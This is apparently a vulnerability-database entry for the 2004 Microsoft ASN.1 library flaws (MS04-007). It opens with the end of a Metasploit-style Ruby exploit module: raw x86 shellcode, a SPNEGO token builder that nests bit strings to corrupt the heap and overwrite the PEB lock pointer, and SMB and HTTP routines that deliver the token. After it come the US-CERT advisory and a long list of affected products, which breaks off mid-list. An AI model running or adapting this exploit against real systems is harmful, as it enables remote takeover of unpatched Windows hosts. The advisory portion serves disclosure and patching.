        "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
        "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
        "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
        "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
        "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
        "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
        "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
        "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
        "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
        "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
        "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
        "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
        "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
        "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
        "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
        "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
        "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
        "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
        "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
        "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
        "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
        "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
        "\x08\x00\xeb\xfe"

    # payload.encoded is supplied by the framework; it becomes the second stage.
    token = spnego_token(stage0, payload.encoded)

    # Dispatch on the user-selected transport.
    case datastore['PROTO']
        when 'smb'
            exploit_smb(token)
        when 'http'
            exploit_http(token)
        else
            print_status("Invalid application protocol specified, use smb or http")
    end
end


# SMB transport: connects, negotiates an SMB session and submits the token as
# the blob of an NTLMv2 session setup.
#
# token - the byte string produced by spnego_token.
#
# Every exception raised during the exchange is caught and reported with
# print_status rather than re-raised. A message containing
# "error code 0x00050001" is reported as the target having already been hit;
# that is the only response-side condition this method distinguishes.
def exploit_smb(token)
    connect

    client = Rex::Proto::SMB::Client.new(sock)

    begin
        # The session request is skipped when the SMBDirect option is set.
        client.session_request(smb_hostname()) if not datastore['SMBDirect']
        client.negotiate
        client.session_setup_ntlmv2_blob(token)
    rescue => e
        if (e.to_s =~ /error code 0x00050001/)
            print_status("The target system has already been exploited")
        else
            print_status("Error: #{e}")
        end
    end

    # handler and disconnect are not defined in this file; presumably they
    # come from the framework mixins. They run whether or not the exchange
    # above raised.
    handler
    disconnect
end

# HTTP transport: sends a single HTTP/1.0 GET for "/" whose
# "Authorization: Negotiate" header carries the base64-encoded token, then
# reads one response and checks it for two error-code strings.
#
# token - the byte string produced by spnego_token.
#
# For defenders: the token travels in a request header, so it is visible to
# anything that records or inspects Authorization headers on the request path.
def exploit_http(token)
    connect

    req = "GET / HTTP/1.0\r\n"
    req << "Host: #{ datastore['RHOST']}\r\n"
    # NOTE(review): the second argument ('') is presumably the line delimiter,
    # i.e. the base64 text is emitted unwrapped; confirm against Rex::Text.
    req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"

    sock.put(req)
    res = sock.get_once

    # 0x80090301 in the response: reported as "Negotiate not supported or
    # already exploited".
    if (res and res =~ /0x80090301/)
        print_status("This server does not support the Negotiate protocol or has already been exploited")
    end

    # 0x80090304 in the response: reported verbatim; the file gives no
    # interpretation for it.
    if (res and res =~ /0x80090304/)
        print_status("This server responded with error code 0x80090304 (wth?)")
    end

    # handler and disconnect are not defined in this file; presumably they
    # come from the framework mixins.
    handler
    disconnect
end


# Returns an ASN.1 encoded string
def enc_asn1(str)
    # Thin wrapper: delegate to the Rex SMB utility encoder and hand back
    # whatever it produces.
    encoded = Rex::Proto::SMB::Utils.asn1encode(str)
    encoded
end

# Returns an ASN.1 encoded bit string with 0 unused bits
def enc_bits(str)
    # Content starts with a zero byte (no unused bits), followed by the data;
    # the encoded content is then placed under tag byte 0x03.
    content = "\x00" + str
    encoded_content = enc_asn1(content)
    "\x03" + encoded_content
end

# Returns a BER encoded constructed bit string
def enc_constr(*str_arr)
    # Glue the already-encoded pieces together in argument order, then wrap
    # the result under tag byte 0x23 (constructed bit string).
    joined = str_arr.join('')
    encoded_children = enc_asn1(joined)
    "\x23" + encoded_children
end

# Returns a BER encoded SPNEGO token
# Assembles the token sent by exploit_smb / exploit_http: a tree of nested
# constructed bit strings (enc_constr / enc_bits) wrapped in an
# application-constructed object that carries the SPNEGO OID and a
# NegTokenInit element.
#
# stage0 - first-stage byte string; must be at most 1032 bytes.
# stage1 - second-stage byte string; together with the 8-byte tag it must be
#          at most 1033 bytes.
#
# Returns the encoded token, or nil (after printing a status line) when
# either argument is missing or exceeds its length limit.
#
# For defenders: the distinguishing shape is the one the advisory text on this
# page describes, a constructed bit string containing further nested
# constructed bit strings, delivered inside a SPNEGO NegTokenInit.
def spnego_token(stage0, stage1)

    # Both stages are required.
    if !(stage0 and stage1)
        print_status("Invalid parameters passed to spnego_token")
        return
    end

    if (stage0.length > 1032)
        print_status("The stage 0 shellcode is longer than 1032 bytes")
        return
    end

    # Fixed 8-byte marker placed in front of stage1.
    tag = "\x90\x42\x90\x42\x90\x42\x90\x42"

    if ((tag.length + stage1.length) > 1033)
        print_status("The stage 1 shellcode is too long")
        return
    end


    # The first two overwrites must succeed, so we write to an unused location
    # in the PEB block. We don't care about the values, because after this the
    # doubly linked list of free blocks is corrupted and we get to the second
    # overwrite which is more useful.

    fw = "\xf8\x0f\x01\x00"     # 0x00010ff8
    bk = "\xf8\x0f\x01"

    # The second overwrite writes the address of our shellcode into the
    # FastPebLockRoutine pointer in the PEB

    peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB

    # Nested structure; the "A"/"B"/"C"/"D" runs pad each element to a fixed
    # length (1024, 1033, 1032 and 1040 bytes respectively).
    bitstring = enc_constr( 
        enc_bits("A" * 1024),
        "\x03\x00",
        enc_constr(
            enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))),
            enc_constr( enc_bits(fw + bk) ),
            enc_constr(
                enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))),
                enc_constr(
                    enc_bits("\xeb\x06" + make_nops(6)),
                    enc_bits("D" * 1040)
                )
            )
        )
    )

    # Outer envelope: application tag, SPNEGO OID, then NegTokenInit holding
    # the bit string built above.
    token = "\x60" + enc_asn1(                 # Application Constructed Object
        "\x06\x06\x2b\x06\x01\x05\x05\x02" +   # SPNEGO OID
        "\xa0" + enc_asn1(                     # NegTokenInit (0xa0)
            "\x30" + enc_asn1(
                "\xa1" + enc_asn1(
                    bitstring
                )
            )
        )
    )

    return token    
end

end . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Multiple Vulnerabilities in Microsoft ASN.1 Library

Original issue date: February 10, 2004 Last revised: -- Source: US-CERT

A complete revision history is at the end of this document. According to information from eEye Digital Security, the vulnerabilities involve integer overflows and other flaws in integer arithmetic.

Any application that loads the ASN.1 library could serve as an attack vector. In particular, ASN.1 is used by a number of cryptographic and authentication services such as digital certificates (X.509), Kerberos, NTLMv2, SSL, and TLS. Both client and server systems are affected. The Local Security Authority Subsystem (lsass.exe) and a component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1 library.

Solution

Apply a patch

Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-007.

Vendor Information

This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments.

Microsoft

 Please see Microsoft Security Bulletin MS04-007.

References

 * Vulnerability Note VU#216324 -
   <http://www.kb.cert.org/vuls/id/216324>
 * Vulnerability Note VU#583108 -
   <http://www.kb.cert.org/vuls/id/583108>
 * eEye Digital Security Advisory AD20040210 -
   <http://www.eeye.com/html/Research/Advisories/AD20040210.html>
 * eEye Digital Security Advisory AD20040210-2 -
   <http://www.eeye.com/html/Research/Advisories/AD20040210-2.html>
 * Microsoft Security Bulletin MS04-007 -
   <http://microsoft.com/technet/security/bulletin/MS04-007.asp>
 * Microsoft Knowledge Base Article 252648 -
   <http://support.microsoft.com/default.aspx?scid=252648>
 _________________________________________________________________

These vulnerabilities were researched and reported by eEye Digital Security. Information from eEye and Microsoft was used in this document. ___________

Feedback can be directed to the author, Art Manion.

Copyright 2004 Carnegie Mellon University.

Revision History

February 10, 2004: Initial release

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQFAKVrdXlvNRxAkFWARAuOvAJwL2gJJPBRdrtZ0Le4yyLQLu7CHewCgvaCW 5hU8LQ/oOC4sI8PpnkppCyg= =Oe/N -----END PGP SIGNATURE-----



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200403-0051",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": null,
        "scope": null,
        "trust": 1.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "r2"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "*"
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "standard"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "*"
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "web"
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "enterprise"
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "enterprise_64-bit"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "yahoo",
        "version": "5.6.0.1358"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "yahoo",
        "version": "5.6.0.1356"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "yahoo",
        "version": "5.6.0.1355"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "yahoo",
        "version": "5.6.0.1351"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "yahoo",
        "version": "5.6.0.1347"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "yahoo",
        "version": "5.6"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vandyke",
        "version": "4.0.5"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vandyke",
        "version": "4.0.4"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vandyke",
        "version": "4.0.3"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vandyke",
        "version": "4.0.2"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vandyke",
        "version": "4.0.1"
      },
      {
        "model": "windows xp professional sp1",
        "scope": null,
        "trust": 0.9,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows xp professional",
        "scope": null,
        "trust": 0.9,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows xp home sp1",
        "scope": null,
        "trust": 0.9,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows xp home",
        "scope": null,
        "trust": 0.9,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows xp 64-bit edition version sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows xp 64-bit edition version",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows xp 64-bit edition sp1",
        "scope": null,
        "trust": 0.9,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows xp 64-bit edition",
        "scope": null,
        "trust": 0.9,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows server web edition",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows server standard edition",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows server enterprise edition itanium",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "20030"
      },
      {
        "model": "windows server enterprise edition",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows server datacenter edition itanium",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "20030"
      },
      {
        "model": "windows server datacenter edition",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows nt workstation sp6a",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp6",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp5",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp4",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp3",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp2",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp6",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp5",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp4",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp3",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp2",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp6a",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp6",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp5",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp4",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp3",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp2",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows 98se",
        "scope": null,
        "trust": 0.9,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "98"
      },
      {
        "model": "windows server sp4",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows server sp3",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows server sp2",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows server sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows professional sp4",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows professional sp3",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows professional sp2",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows professional sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows professional",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows advanced server sp4",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows advanced server sp3",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows advanced server sp2",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows advanced server sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows advanced server",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "quicken",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "intuit",
        "version": "2003"
      },
      {
        "model": "instant messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "aol",
        "version": "5.2.3292"
      },
      {
        "model": "instant messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "aol",
        "version": "5.1.3036"
      },
      {
        "model": "instant messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "aol",
        "version": "5.0.2938"
      },
      {
        "model": "windows 2000",
        "scope": null,
        "trust": 0.8,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "4.0 (server)"
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "4.0 (terminal_srv)"
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "4.0 (workstation)"
      },
      {
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "none"
      },
      {
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(x64)"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(x64)"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "sp3"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "yahoo",
        "version": "5.5.1249"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "yahoo",
        "version": "5.5"
      },
      {
        "model": "jukebox",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "musicmatch",
        "version": "8.2"
      },
      {
        "model": "jukebox",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "musicmatch",
        "version": "8.1"
      },
      {
        "model": "jukebox",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "musicmatch",
        "version": "8.0"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "8.10"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "8.01"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "8.00"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "7.04"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "7.02"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "7.01"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "7.0"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "6.02"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "6.01"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "6.0"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "5.03"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "5.01"
      },
      {
        "model": "software paintshop pro",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "jasc",
        "version": "5.0"
      },
      {
        "model": "turbotax",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "intuit",
        "version": "2003"
      },
      {
        "model": "instant messenger beta",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "aol",
        "version": "5.5.3415"
      },
      {
        "model": "xmlspy professional edition r2",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "altova",
        "version": "2004"
      },
      {
        "model": "xmlspy professional edition",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "altova",
        "version": "2004"
      },
      {
        "model": "xmlspy home edition r2",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "altova",
        "version": "2004"
      },
      {
        "model": "xmlspy home edition",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "altova",
        "version": "2004"
      },
      {
        "model": "xmlspy enterprise edition r2",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "altova",
        "version": "2004"
      },
      {
        "model": "xmlspy enterprise edition",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "altova",
        "version": "2004"
      },
      {
        "model": "acrobat",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "adobe",
        "version": "6.0"
      },
      {
        "model": "acrobat",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "adobe",
        "version": "5.0.5"
      },
      {
        "model": "acrobat",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "adobe",
        "version": "5.0"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "sp1"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "sp3"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "professional"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "server"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "advanced_server"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "sp2"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.8"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.7"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.6"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.5"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.4"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.3"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.2"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4.1"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.4"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.3.4"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.3.3"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.3.2"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.3.1"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.3"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.2.2"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.2.1"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.2"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.1.2"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.1.1"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.1"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "3.0"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vandyke",
        "version": "2.4"
      },
      {
        "model": "small business server",
        "scope": "eq",
        "trust": 0.3,
